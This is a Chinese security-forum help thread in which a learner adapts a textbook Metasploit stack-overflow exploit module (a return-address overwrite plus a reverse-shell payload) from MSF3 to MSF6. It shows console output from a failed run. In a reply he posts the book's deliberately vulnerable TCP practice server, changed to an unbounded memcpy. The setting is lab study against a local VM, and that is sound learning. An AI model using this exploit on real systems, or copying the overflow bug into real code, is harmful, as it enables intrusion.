[求助] 关于 0day 软件漏洞分析技术2版里 MSF 的exploit的示例报错-求助问答-看雪-安全社区|安全招聘|kanxue.com

未解决 [求助] 关于 0day 软件漏洞分析技术2版里 MSF 的exploit的示例报错 300雪币

发表于: 2024-10-28 21:01 1589

未解决 [求助] 关于 0day 软件漏洞分析技术2版里 MSF 的exploit的示例报错 300雪币

mb_ligvrtmq 活跃值

2024-10-28 21:01

1589

关于 0day 软件漏洞分析技术2版里 MSF 的exploit的示例报错

书中原先的示例，加载不进MSF里，如下

#/*****************************************************************************
#      To be the apostrophe which changed "Impossible" into "I'm possible"!
#       
#POC code of chapter 4 in book "Vulnerability Exploit and Analysis Technique"
# 
#file name  : test.rb
#author     : failwest  
#date       : 2007.4.4
#description    : used as a demo to show how to implemented exploit module of MSF 
#Noticed    : create a sub directory named "failwest" in the exploit directory
#         of MSF 3.0. For example, the default directory of exploit is 
#         "C:\Program Files\Metasploit\Framework3\framework\modules\exploits"
#         this module should be put into
#         "C:\Program Files\Metasploit\Framework3\framework\modules\exploits\failwest\"
#version    : 1.0
#E-mail     : failwest@gmail.com
#       
#   Only for educational purposes    enjoy the fun from exploiting :)
#******************************************************************************/
require 'msf/core'
module Msf
class Exploits::Failwest::Test < Msf::Exploit::Remote
include Exploit::Remote::Tcp
     
    def initialize(info = {})
        super(update_info(info,
        'Name'      => 'failwest_test',
        'Platform'  => 'win',
        'Targets'   => [
                    ['Windows 2000',  {'Ret' => 0x77F8948B } ], 
                    ['Windows XP SP2',{'Ret' => 0x7C914393 } ],
                    ['Windows XP SP1',{'Ret' => 0x77E7AE59 } ]
                   ],
        'Payload'       => {
                    'Space'    => 200,
                    'BadChars' => "\x00",
                    }
        ))
    end #end of initialize
 
    def exploit
        connect
        attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
        sock.put(attack_buf)    
        handler
        disconnect
    end  #end of exploit def
end #end of class def
end #end of module def

我参考了MSF里现有的示例，改了下

#/*****************************************************************************
#      To be the apostrophe which changed "Impossible" into "I'm possible"!
#       
#POC code of chapter 4 in book "Vulnerability Exploit and Analysis Technique"
# 
#file name  : test.rb
#author     : failwest  
#date       : 2007.4.4
#description    : used as a demo to show how to implemented exploit module of MSF 
#Noticed    : create a sub directory named "failwest" in the exploit directory
#         of MSF 3.0. For example, the default directory of exploit is 
#         "C:\Program Files\Metasploit\Framework3\framework\modules\exploits"
#         this module should be put into
#         "C:\Program Files\Metasploit\Framework3\framework\modules\exploits\failwest\"
#version    : 1.0
#E-mail     : failwest@gmail.com
#       
#   Only for educational purposes    enjoy the fun from exploiting :)
#******************************************************************************/
 
class MetasploitModule < Msf::Exploit::Remote
    include Msf::Exploit::Remote::Tcp
    Rank = GreatRanking
    def initialize(info = {})
        super(update_info(info,
        'Name'      => 'yuker_test',
        'Platform'  => 'win',
        # 'Targets' => [
        #           ['Windows 2000',  {'Ret' => 0x77F8948B } ], 
        #           ['Windows XP SP2',{'Ret' => 0x7C914393 } ],
        #           ['Windows XP SP1',{'Ret' => 0x77E7AE59 } ]
        #          ],
        'Targets'        =>
        [
        #   [ 'Automatic1111', { } ],
        #   [
        #     'Windows 2000', # Tested OK - 11/25/2005 hdm
        #     {
        #       'Platform' => 'win',
        #       'Ret'     => 0x77F8948B,
        #     },
        #   ],
        #   [
        #     'Windows XP SP2', # Tested OK - 11/25/2005 hdm
        #     {
        #       'Platform' => 'win',
        #       'Ret'     => 0x7C914393,
        #     },
        #   ],
          [
            'Windows XP SP1', # Tested OK - 11/25/2005 hdm
            {
              'Platform' => 'win',
              'Ret'     => 0x77E7AE59,
            },
          ],
        ],
        'Payload'       => {
                    'Space'    => 200,
                    'BadChars' => "\x00",
                    }
        ))
    end #end of initialize
 
    def exploit
        connect
        attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
        sock.put(attack_buf)    
        handler
        disconnect
    end  #end of exploit def
end #end of class def

加载倒是能加载进去了，但是使用MSF的时候，配置都配好了，就是报编码器无法编码的错误

msf6 exploit(windows/wins/yuker_test) > show options
 
Module options (exploit/windows/wins/yuker_test):
 
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.92.137   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
                                      /using-metasploit.html
   RPORT   7777             yes       The target port (TCP)
 
 
Payload options (generic/shell_reverse_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.92.131   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Windows XP SP1
 
 
 
View the full module info with the info, or info -d command.
 
msf6 exploit(windows/wins/yuker_test) > exploit
 
[-] 192.168.92.137:7777 - Exploit failed: generic/shell_reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.

我看了下GITHUB上的ISSUE，有相关的回复但没理解，说实话RUBY就是照着书上学了下，望好心人指导下

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・0

免费・0

支持

最新回复 (1)
mb_ligvrtmq 雪币： 2706 活跃值： (120) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 1 粉丝 0 关注私信	mb_ligvrtmq 2 楼刚解决了目标程序的代码如下： /*************************************************************************** To be the apostrophe which changed "Impossible" into "I'm possible"! POC code of chapter 4 in book "Vulnerability Exploit and Analysis Technique" file name : target_server.cpp author : failwest date : 2007.4.4 description : TCP server which got a stack overflow bug for exploit practice Noticed : Complied with VC 6.0 and build into release version are recommend version : 1.0 E-mail : failwest@gmail.com Only for educational purposes enjoy the fun from exploiting :) ***************************************************************************/ #include<iostream.h> #include<winsock2.h> #pragma comment(lib, "ws2_32.lib") void msg_display(char buf) { char msg[200]; //strcpy(msg,buf);// overflow here, copy 0x200 to 200 程序原先使用字符串拷贝 memcpy(msg,buf,0x800); // 改为直接内存拷贝，避过了BADCHARS '/x00' cout<<"*******************"<<endl; cout<<"received:"<<endl; cout<<msg<<endl; } void main() { int sock,msgsock,lenth,receive_len; struct sockaddr_in sock_server,sock_client; char buf[0x800]; //noticed it is 0x200 WSADATA wsa; WSAStartup(MAKEWORD(1,1),&wsa); if((sock=socket(AF_INET,SOCK_STREAM,0))<0) { cout<<sock<<"socket creating error!"<<endl; exit(1); } sock_server.sin_family=AF_INET; sock_server.sin_port=htons(7777); sock_server.sin_addr.s_addr=htonl(INADDR_ANY); if(bind(sock,(struct sockaddr)&sock_server,sizeof(sock_server))) { cout<<"binging stream socket error!"<<endl; } cout<<"************************************"<<endl; cout<<" exploit target server 1.0 "<<endl; cout<<"***********************************"<<endl; listen(sock,4); lenth=sizeof(struct sockaddr); do{ msgsock=accept(sock,(struct sockaddr)&sock_client,(int*)&lenth); if(msgsock==-1) { cout<<"accept error!"<<endl; break; } else do { memset(buf,0,sizeof(buf)); if((receive_len=recv(msgsock,buf,sizeof(buf),0))<0) { cout<<"reading stream message erro!"<<endl; receive_len=0; } msg_display(buf);//trigged the overflow }while(receive_len); closesocket(msgsock); }while(1); WSACleanup(); } //strcpy(msg,buf);// overflow here, copy 0x200 to 200 程序原先使用字符串拷贝 memcpy(msg,buf,0x800); // 改为直接内存拷贝，避过了BADCHARS '/x00' 目标测试用例里原先使用了 strcpy 来造成栈溢出，可由于现在MSF6里面无法对 windows/exec的payload进行避免‘/x00’编码，所以就改为采用memset来进行溢出，书里面的MSF3与MSF6相隔时间太久了 2024-10-29 12:50 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (1)

mb_ligvrtmq

雪币： 2706

活跃值： (120)

能力值：

( LV2，RANK：10 )

在线值：

发帖

回帖

粉丝

关注

私信

mb_ligvrtmq: 2 楼

刚解决了

目标程序的代码如下：

/*****************************************************************************
      To be the apostrophe which changed "Impossible" into "I'm possible"!
		
POC code of chapter 4 in book "Vulnerability Exploit and Analysis Technique"
 
file name	: target_server.cpp
author		: failwest  
date		: 2007.4.4
description	: TCP server which got a stack overflow bug for exploit practice 
Noticed		: Complied with VC 6.0 and build into release version are recommend
version		: 1.0
E-mail		: failwest@gmail.com
		
	Only for educational purposes    enjoy the fun from exploiting :)
******************************************************************************/
#include<iostream.h>
#include<winsock2.h>
#pragma comment(lib, "ws2_32.lib")
void msg_display(char * buf)
{
	char msg[200];
	//strcpy(msg,buf);// overflow here, copy 0x200 to 200   程序原先使用字符串拷贝
	memcpy(msg,buf,0x800);  // 改为直接内存拷贝，避过了BADCHARS '/x00'
	cout<<"********************"<<endl;
	cout<<"received:"<<endl;
	cout<<msg<<endl;
}
void main()
{
	int sock,msgsock,lenth,receive_len;
	struct sockaddr_in sock_server,sock_client;
	char buf[0x800]; //noticed it is 0x200
	
	WSADATA wsa;
	WSAStartup(MAKEWORD(1,1),&wsa);
	if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		cout<<sock<<"socket creating error!"<<endl;
		exit(1);
	}
	sock_server.sin_family=AF_INET;
	sock_server.sin_port=htons(7777);
	sock_server.sin_addr.s_addr=htonl(INADDR_ANY);
	if(bind(sock,(struct sockaddr*)&sock_server,sizeof(sock_server)))
	{
		cout<<"binging stream socket error!"<<endl;
	}
	cout<<"**************************************"<<endl;
	cout<<"     exploit target server 1.0	   "<<endl;
	cout<<"**************************************"<<endl;
	listen(sock,4);
	lenth=sizeof(struct sockaddr);
	do{
		msgsock=accept(sock,(struct sockaddr*)&sock_client,(int*)&lenth);
		if(msgsock==-1)
		{
			cout<<"accept error!"<<endl;
			break;
		}
		else 
			do
			{
				memset(buf,0,sizeof(buf));
				if((receive_len=recv(msgsock,buf,sizeof(buf),0))<0)
				{
					cout<<"reading stream message erro!"<<endl;
					receive_len=0; 
				}
				msg_display(buf);//trigged the overflow
			}while(receive_len);
			closesocket(msgsock);
	}while(1);
	WSACleanup();
}

//strcpy(msg,buf);// overflow here, copy 0x200 to 200   程序原先使用字符串拷贝
	memcpy(msg,buf,0x800);  // 改为直接内存拷贝，避过了BADCHARS '/x00'

目标测试用例里原先使用了 strcpy 来造成栈溢出，可由于现在MSF6里面无法对 windows/exec的payload进行避免‘/x00’编码，所以就改为采用memset来进行溢出，书里面的MSF3与MSF6相隔时间太久了

2024-10-29 12:50

mb_ligvrtmq

发帖

回帖

RANK

关注

私信

他的文章

[求助] 关于 0day 软件漏洞分析技术2版里 MSF 的exploit的示例报错 1590

关于我们

联系我们

企业服务

看雪公众号

未解决 [求助] 关于 0day 软件漏洞分析技术2版里 MSF 的exploit的示例 报错 300雪币

未解决 [求助] 关于 0day 软件漏洞分析技术2版里 MSF 的exploit的示例报错 300雪币